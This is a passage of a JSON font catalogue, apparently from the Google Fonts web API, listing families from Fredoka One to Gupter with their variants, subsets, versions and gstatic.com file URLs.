        "regular": "http://fonts.gstatic.com/s/fredokaone/v8/k3kUo8kEI-tA1RRcTZGmTmHBA6aF8Bf_.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Freehand",
      "variants": [
        "regular"
      ],
      "subsets": [
        "khmer"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/freehand/v12/cIf-Ma5eqk01VjKTgAmBTmUOmZJk.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Fresca",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/fresca/v9/6ae94K--SKgCzbM2Gr0W13DKPA.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Frijole",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/frijole/v9/uU9PCBUR8oakM2BQ7xPb3vyHmlI.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Fruktur",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v13",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/fruktur/v13/SZc53FHsOru5QYsMfz3GkUrS8DI.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Fugaz One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/fugazone/v10/rax_HiWKp9EAITukFslMBBJek0vA8A.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "GFS Didot",
      "variants": [
        "regular"
      ],
      "subsets": [
        "greek"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/gfsdidot/v10/Jqzh5TybZ9vZMWFssvwiF-fGFSCGAA.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "GFS Neohellenic",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "greek"
      ],
      "version": "v13",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/gfsneohellenic/v13/8QIRdiDOrfiq0b7R8O1Iw9WLcY5TLahP46UDUw.ttf",
        "italic": "http://fonts.gstatic.com/s/gfsneohellenic/v13/8QITdiDOrfiq0b7R8O1Iw9WLcY5jL6JLwaATU91X.ttf",
        "700": "http://fonts.gstatic.com/s/gfsneohellenic/v13/8QIUdiDOrfiq0b7R8O1Iw9WLcY5rkYdr644fWsRO9w.ttf",
        "700italic": "http://fonts.gstatic.com/s/gfsneohellenic/v13/8QIWdiDOrfiq0b7R8O1Iw9WLcY5jL5r37oQbeMFe985V.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Gabriela",
      "variants": [
        "regular"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/gabriela/v9/qkBWXvsO6sreR8E-b_m-zrpHmRzC.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Gaegu",
      "variants": [
        "300",
        "regular",
        "700"
      ],
      "subsets": [
        "korean",
        "latin"
      ],
      "version": "v8",
      "lastModified": "2019-07-16",
      "files": {
        "300": "http://fonts.gstatic.com/s/gaegu/v8/TuGSUVB6Up9NU57nifw74sdtBk0x.ttf",
        "regular": "http://fonts.gstatic.com/s/gaegu/v8/TuGfUVB6Up9NU6ZLodgzydtk.ttf",
        "700": "http://fonts.gstatic.com/s/gaegu/v8/TuGSUVB6Up9NU573jvw74sdtBk0x.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Gafata",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/gafata/v9/XRXV3I6Cn0VJKon4MuyAbsrVcA.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Galada",
      "variants": [
        "regular"
      ],
      "subsets": [
        "bengali",
        "latin"
      ],
      "version": "v6",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/galada/v6/H4cmBXyGmcjXlUX-8iw-4Lqggw.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Galdeano",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/galdeano/v10/uU9MCBoQ4YOqOW1boDPx8PCOg0uX.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Galindo",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/galindo/v8/HI_KiYMeLqVKqwyuQ5HiRp-dhpQ.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Gamja Flower",
      "variants": [
        "regular"
      ],
      "subsets": [
        "korean",
        "latin"
      ],
      "version": "v8",
      "lastModified": "2019-07-16",
      "files": {
        "regular": "http://fonts.gstatic.com/s/gamjaflower/v8/6NUR8FiKJg-Pa0rM6uN40Z4kyf9Fdty2ew.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Gayathri",
      "variants": [
        "100",
        "regular",
        "700"
      ],
      "subsets": [
        "latin",
        "malayalam"
      ],
      "version": "v2",
      "lastModified": "2020-07-23",
      "files": {
        "100": "http://fonts.gstatic.com/s/gayathri/v2/MCoWzAb429DbBilWLLhc-pvSA_gA2W8.ttf",
        "regular": "http://fonts.gstatic.com/s/gayathri/v2/MCoQzAb429DbBilWLIA48J_wBugA.ttf",
        "700": "http://fonts.gstatic.com/s/gayathri/v2/MCoXzAb429DbBilWLLiE37v4LfQJwHbn.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Gelasio",
      "variants": [
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v3",
      "lastModified": "2020-09-25",
      "files": {
        "regular": "http://fonts.gstatic.com/s/gelasio/v3/cIf9MaFfvUQxTTqSxCmrYGkHgIs.ttf",
        "italic": "http://fonts.gstatic.com/s/gelasio/v3/cIf_MaFfvUQxTTqS9CuhZEsCkIt9QQ.ttf",
        "500": "http://fonts.gstatic.com/s/gelasio/v3/cIf4MaFfvUQxTTqS_N2CRGEsnIJkWL4.ttf",
        "500italic": "http://fonts.gstatic.com/s/gelasio/v3/cIf6MaFfvUQxTTqS9CuZkGImmKBhSL7Y1Q.ttf",
        "600": "http://fonts.gstatic.com/s/gelasio/v3/cIf4MaFfvUQxTTqS_PGFRGEsnIJkWL4.ttf",
        "600italic": "http://fonts.gstatic.com/s/gelasio/v3/cIf6MaFfvUQxTTqS9CuZvGUmmKBhSL7Y1Q.ttf",
        "700": "http://fonts.gstatic.com/s/gelasio/v3/cIf4MaFfvUQxTTqS_JWERGEsnIJkWL4.ttf",
        "700italic": "http://fonts.gstatic.com/s/gelasio/v3/cIf6MaFfvUQxTTqS9CuZ2GQmmKBhSL7Y1Q.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Gentium Basic",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v12",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/gentiumbasic/v12/Wnz9HAw9aB_JD2VGQVR80We3HAqDiTI_cIM.ttf",
        "italic": "http://fonts.gstatic.com/s/gentiumbasic/v12/WnzjHAw9aB_JD2VGQVR80We3LAiJjRA6YIORZQ.ttf",
        "700": "http://fonts.gstatic.com/s/gentiumbasic/v12/WnzgHAw9aB_JD2VGQVR80We3JLasrToUbIqIfBU.ttf",
        "700italic": "http://fonts.gstatic.com/s/gentiumbasic/v12/WnzmHAw9aB_JD2VGQVR80We3LAixMT8eaKiNbBVWkw.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Gentium Book Basic",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/gentiumbookbasic/v11/pe0zMJCbPYBVokB1LHA9bbyaQb8ZGjcIV7t7w6bE2A.ttf",
        "italic": "http://fonts.gstatic.com/s/gentiumbookbasic/v11/pe0xMJCbPYBVokB1LHA9bbyaQb8ZGjc4VbF_4aPU2Ec9.ttf",
        "700": "http://fonts.gstatic.com/s/gentiumbookbasic/v11/pe0wMJCbPYBVokB1LHA9bbyaQb8ZGjcw65Rfy43Y0V4kvg.ttf",
        "700italic": "http://fonts.gstatic.com/s/gentiumbookbasic/v11/pe0-MJCbPYBVokB1LHA9bbyaQb8ZGjc4VYnDzofc81s0voO3.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Geo",
      "variants": [
        "regular",
        "italic"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/geo/v12/CSRz4zRZlufVL3BmQjlCbQ.ttf",
        "italic": "http://fonts.gstatic.com/s/geo/v12/CSRx4zRZluflLXpiYDxSbf8r.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Geostar",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/geostar/v11/sykz-yx4n701VLOftSq9-trEvlQ.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Geostar Fill",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/geostarfill/v11/AMOWz4SWuWiXFfjEohxQ9os0U1K2w9lb4g.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Germania One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/germaniaone/v8/Fh4yPjrqIyv2ucM2qzBjeS3ezAJONau6ew.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Gidugu",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "telugu"
      ],
      "version": "v8",
      "lastModified": "2020-09-25",
      "files": {
        "regular": "http://fonts.gstatic.com/s/gidugu/v8/L0x8DFMkk1Uf6w3RvPCmRSlUig.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Gilda Display",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/gildadisplay/v8/t5tmIRoYMoaYG0WEOh7HwMeR7TnFrpOHYh4.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Girassol",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v3",
      "lastModified": "2020-09-25",
      "files": {
        "regular": "http://fonts.gstatic.com/s/girassol/v3/JTUUjIo_-DK48laaNC9Nz2pJzxbi.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Give You Glory",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/giveyouglory/v10/8QIQdiHOgt3vv4LR7ahjw9-XYc1zB4ZD6rwa.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Glass Antiqua",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/glassantiqua/v8/xfu30Wr0Wn3NOQM2piC0uXOjnL_wN6fRUkY.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Glegoo",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/glegoo/v10/_Xmt-HQyrTKWaw2Ji6mZAI91xw.ttf",
        "700": "http://fonts.gstatic.com/s/glegoo/v10/_Xmu-HQyrTKWaw2xN4a9CKRpzimMsg.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Gloria Hallelujah",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/gloriahallelujah/v12/LYjYdHv3kUk9BMV96EIswT9DIbW-MLSy3TKEvkCF.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Goblin One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/goblinone/v10/CSR64z1ZnOqZRjRCBVY_TOcATNt_pOU.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Gochi Hand",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/gochihand/v11/hES06XlsOjtJsgCkx1PkTo71-n0nXWA.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Goldman",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v1",
      "lastModified": "2020-11-06",
      "files": {
        "regular": "http://fonts.gstatic.com/s/goldman/v1/pe0uMIWbN4JFplR2LDJ4Bt-7G98.ttf",
        "700": "http://fonts.gstatic.com/s/goldman/v1/pe0rMIWbN4JFplR2FI5XIteQB9Zra1U.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Gorditas",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/gorditas/v8/ll8_K2aTVD26DsPEtQDoDa4AlxYb.ttf",
        "700": "http://fonts.gstatic.com/s/gorditas/v8/ll84K2aTVD26DsPEtThUIooIvAoShA1i.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Gothic A1",
      "variants": [
        "100",
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "korean",
        "latin"
      ],
      "version": "v8",
      "lastModified": "2019-07-16",
      "files": {
        "100": "http://fonts.gstatic.com/s/gothica1/v8/CSR74z5ZnPydRjlCCwlCCMcqYtd2vfwk.ttf",
        "200": "http://fonts.gstatic.com/s/gothica1/v8/CSR44z5ZnPydRjlCCwlCpOYKSPl6tOU9Eg.ttf",
        "300": "http://fonts.gstatic.com/s/gothica1/v8/CSR44z5ZnPydRjlCCwlCwOUKSPl6tOU9Eg.ttf",
        "regular": "http://fonts.gstatic.com/s/gothica1/v8/CSR94z5ZnPydRjlCCwl6bM0uQNJmvQ.ttf",
        "500": "http://fonts.gstatic.com/s/gothica1/v8/CSR44z5ZnPydRjlCCwlCmOQKSPl6tOU9Eg.ttf",
        "600": "http://fonts.gstatic.com/s/gothica1/v8/CSR44z5ZnPydRjlCCwlCtOMKSPl6tOU9Eg.ttf",
        "700": "http://fonts.gstatic.com/s/gothica1/v8/CSR44z5ZnPydRjlCCwlC0OIKSPl6tOU9Eg.ttf",
        "800": "http://fonts.gstatic.com/s/gothica1/v8/CSR44z5ZnPydRjlCCwlCzOEKSPl6tOU9Eg.ttf",
        "900": "http://fonts.gstatic.com/s/gothica1/v8/CSR44z5ZnPydRjlCCwlC6OAKSPl6tOU9Eg.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Gotu",
      "variants": [
        "regular"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v1",
      "lastModified": "2020-04-21",
      "files": {
        "regular": "http://fonts.gstatic.com/s/gotu/v1/o-0FIpksx3QOlH0Lioh6-hU.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Goudy Bookletter 1911",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/goudybookletter1911/v10/sykt-z54laciWfKv-kX8krex0jDiD2HbY6I5tRbXZ4IXAA.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Graduate",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v8",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/graduate/v8/C8cg4cs3o2n15t_2YxgR6X2NZAn2.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Grand Hotel",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/grandhotel/v8/7Au7p_IgjDKdCRWuR1azpmQNEl0O0kEx.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Grandstander",
      "variants": [
        "100",
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900",
        "100italic",
        "200italic",
        "300italic",
        "italic",
        "500italic",
        "600italic",
        "700italic",
        "800italic",
        "900italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v2",
      "lastModified": "2020-09-02",
      "files": {
        "100": "http://fonts.gstatic.com/s/grandstander/v2/ga6fawtA-GpSsTWrnNHPCSIMZhhKpFjyNZIQD1-_D3jWttFGmQk.ttf",
        "200": "http://fonts.gstatic.com/s/grandstander/v2/ga6fawtA-GpSsTWrnNHPCSIMZhhKpFjyNZIQD9--D3jWttFGmQk.ttf",
        "300": "http://fonts.gstatic.com/s/grandstander/v2/ga6fawtA-GpSsTWrnNHPCSIMZhhKpFjyNZIQDwG-D3jWttFGmQk.ttf",
        "regular": "http://fonts.gstatic.com/s/grandstander/v2/ga6fawtA-GpSsTWrnNHPCSIMZhhKpFjyNZIQD1--D3jWttFGmQk.ttf",
        "500": "http://fonts.gstatic.com/s/grandstander/v2/ga6fawtA-GpSsTWrnNHPCSIMZhhKpFjyNZIQD22-D3jWttFGmQk.ttf",
        "600": "http://fonts.gstatic.com/s/grandstander/v2/ga6fawtA-GpSsTWrnNHPCSIMZhhKpFjyNZIQD4G5D3jWttFGmQk.ttf",
        "700": "http://fonts.gstatic.com/s/grandstander/v2/ga6fawtA-GpSsTWrnNHPCSIMZhhKpFjyNZIQD7i5D3jWttFGmQk.ttf",
        "800": "http://fonts.gstatic.com/s/grandstander/v2/ga6fawtA-GpSsTWrnNHPCSIMZhhKpFjyNZIQD9-5D3jWttFGmQk.ttf",
        "900": "http://fonts.gstatic.com/s/grandstander/v2/ga6fawtA-GpSsTWrnNHPCSIMZhhKpFjyNZIQD_a5D3jWttFGmQk.ttf",
        "100italic": "http://fonts.gstatic.com/s/grandstander/v2/ga6ZawtA-GpSsTWrnNHPCSImbyq1fDGZrzwXGpf95zrcsvNDiQlBYQ.ttf",
        "200italic": "http://fonts.gstatic.com/s/grandstander/v2/ga6ZawtA-GpSsTWrnNHPCSImbyq1fDGZrzwXGpf9ZzvcsvNDiQlBYQ.ttf",
        "300italic": "http://fonts.gstatic.com/s/grandstander/v2/ga6ZawtA-GpSsTWrnNHPCSImbyq1fDGZrzwXGpf9uTvcsvNDiQlBYQ.ttf",
        "italic": "http://fonts.gstatic.com/s/grandstander/v2/ga6ZawtA-GpSsTWrnNHPCSImbyq1fDGZrzwXGpf95zvcsvNDiQlBYQ.ttf",
        "500italic": "http://fonts.gstatic.com/s/grandstander/v2/ga6ZawtA-GpSsTWrnNHPCSImbyq1fDGZrzwXGpf91TvcsvNDiQlBYQ.ttf",
        "600italic": "http://fonts.gstatic.com/s/grandstander/v2/ga6ZawtA-GpSsTWrnNHPCSImbyq1fDGZrzwXGpf9OTzcsvNDiQlBYQ.ttf",
        "700italic": "http://fonts.gstatic.com/s/grandstander/v2/ga6ZawtA-GpSsTWrnNHPCSImbyq1fDGZrzwXGpf9ADzcsvNDiQlBYQ.ttf",
        "800italic": "http://fonts.gstatic.com/s/grandstander/v2/ga6ZawtA-GpSsTWrnNHPCSImbyq1fDGZrzwXGpf9ZzzcsvNDiQlBYQ.ttf",
        "900italic": "http://fonts.gstatic.com/s/grandstander/v2/ga6ZawtA-GpSsTWrnNHPCSImbyq1fDGZrzwXGpf9TjzcsvNDiQlBYQ.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Gravitas One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/gravitasone/v10/5h1diZ4hJ3cblKy3LWakKQmaDWRNr3DzbQ.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Great Vibes",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/greatvibes/v8/RWmMoKWR9v4ksMfaWd_JN-XCg6UKDXlq.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Grenze",
      "variants": [
        "100",
        "100italic",
        "200",
        "200italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic",
        "800",
        "800italic",
        "900",
        "900italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v2",
      "lastModified": "2020-07-23",
      "files": {
        "100": "http://fonts.gstatic.com/s/grenze/v2/O4ZRFGb7hR12BxqPm2IjuAkalnmd.ttf",
        "100italic": "http://fonts.gstatic.com/s/grenze/v2/O4ZXFGb7hR12BxqH_VpHsg04k2md0kI.ttf",
        "200": "http://fonts.gstatic.com/s/grenze/v2/O4ZQFGb7hR12BxqPN0MDkicWn2CEyw.ttf",
        "200italic": "http://fonts.gstatic.com/s/grenze/v2/O4ZWFGb7hR12BxqH_Vrrky0SvWWUy1uW.ttf",
        "300": "http://fonts.gstatic.com/s/grenze/v2/O4ZQFGb7hR12BxqPU0ADkicWn2CEyw.ttf",
        "300italic": "http://fonts.gstatic.com/s/grenze/v2/O4ZWFGb7hR12BxqH_VqPkC0SvWWUy1uW.ttf",
        "regular": "http://fonts.gstatic.com/s/grenze/v2/O4ZTFGb7hR12Bxq3_2gnmgwKlg.ttf",
        "italic": "http://fonts.gstatic.com/s/grenze/v2/O4ZRFGb7hR12BxqH_WIjuAkalnmd.ttf",
        "500": "http://fonts.gstatic.com/s/grenze/v2/O4ZQFGb7hR12BxqPC0EDkicWn2CEyw.ttf",
        "500italic": "http://fonts.gstatic.com/s/grenze/v2/O4ZWFGb7hR12BxqH_VrXkS0SvWWUy1uW.ttf",
        "600": "http://fonts.gstatic.com/s/grenze/v2/O4ZQFGb7hR12BxqPJ0YDkicWn2CEyw.ttf",
        "600italic": "http://fonts.gstatic.com/s/grenze/v2/O4ZWFGb7hR12BxqH_Vr7li0SvWWUy1uW.ttf",
        "700": "http://fonts.gstatic.com/s/grenze/v2/O4ZQFGb7hR12BxqPQ0cDkicWn2CEyw.ttf",
        "700italic": "http://fonts.gstatic.com/s/grenze/v2/O4ZWFGb7hR12BxqH_Vqfly0SvWWUy1uW.ttf",
        "800": "http://fonts.gstatic.com/s/grenze/v2/O4ZQFGb7hR12BxqPX0QDkicWn2CEyw.ttf",
        "800italic": "http://fonts.gstatic.com/s/grenze/v2/O4ZWFGb7hR12BxqH_VqDlC0SvWWUy1uW.ttf",
        "900": "http://fonts.gstatic.com/s/grenze/v2/O4ZQFGb7hR12BxqPe0UDkicWn2CEyw.ttf",
        "900italic": "http://fonts.gstatic.com/s/grenze/v2/O4ZWFGb7hR12BxqH_VqnlS0SvWWUy1uW.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Grenze Gotisch",
      "variants": [
        "100",
        "200",
        "300",
        "regular",
        "500",
        "600",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v1",
      "lastModified": "2020-07-08",
      "files": {
        "100": "http://fonts.gstatic.com/s/grenzegotisch/v1/Fh4hPjjqNDz1osh_jX9YfjudpBJBNV5y5wf_k1i5Lz5UcICdYPSd_w.ttf",
        "200": "http://fonts.gstatic.com/s/grenzegotisch/v1/Fh4hPjjqNDz1osh_jX9YfjudpBJBNV5y5wf_k1i5rz9UcICdYPSd_w.ttf",
        "300": "http://fonts.gstatic.com/s/grenzegotisch/v1/Fh4hPjjqNDz1osh_jX9YfjudpBJBNV5y5wf_k1i5cT9UcICdYPSd_w.ttf",
        "regular": "http://fonts.gstatic.com/s/grenzegotisch/v1/Fh4hPjjqNDz1osh_jX9YfjudpBJBNV5y5wf_k1i5Lz9UcICdYPSd_w.ttf",
        "500": "http://fonts.gstatic.com/s/grenzegotisch/v1/Fh4hPjjqNDz1osh_jX9YfjudpBJBNV5y5wf_k1i5HT9UcICdYPSd_w.ttf",
        "600": "http://fonts.gstatic.com/s/grenzegotisch/v1/Fh4hPjjqNDz1osh_jX9YfjudpBJBNV5y5wf_k1i58ThUcICdYPSd_w.ttf",
        "700": "http://fonts.gstatic.com/s/grenzegotisch/v1/Fh4hPjjqNDz1osh_jX9YfjudpBJBNV5y5wf_k1i5yDhUcICdYPSd_w.ttf",
        "800": "http://fonts.gstatic.com/s/grenzegotisch/v1/Fh4hPjjqNDz1osh_jX9YfjudpBJBNV5y5wf_k1i5rzhUcICdYPSd_w.ttf",
        "900": "http://fonts.gstatic.com/s/grenzegotisch/v1/Fh4hPjjqNDz1osh_jX9YfjudpBJBNV5y5wf_k1i5hjhUcICdYPSd_w.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Griffy",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/griffy/v9/FwZa7-ox2FQh9kfwSNSEwM2zpA.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Gruppo",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v11",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/gruppo/v11/WwkfxPmzE06v_ZWFWXDAOIEQUQ.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Gudea",
      "variants": [
        "regular",
        "italic",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/gudea/v10/neIFzCqgsI0mp-CP9IGON7Ez.ttf",
        "italic": "http://fonts.gstatic.com/s/gudea/v10/neILzCqgsI0mp9CN_oWsMqEzSJQ.ttf",
        "700": "http://fonts.gstatic.com/s/gudea/v10/neIIzCqgsI0mp9gz26WGHK06UY30.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Gugi",
      "variants": [
        "regular"
      ],
      "subsets": [
        "korean",
        "latin"
      ],
      "version": "v8",
      "lastModified": "2019-07-16",
      "files": {
        "regular": "http://fonts.gstatic.com/s/gugi/v8/A2BVn5dXywshVA6A9DEfgqM.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Gupter",
      "variants": [
        "regular",
        "500",
        "700"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v2",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/gupter/v2/2-cm9JNmxJqPO1QUYZa_Wu_lpA.ttf",
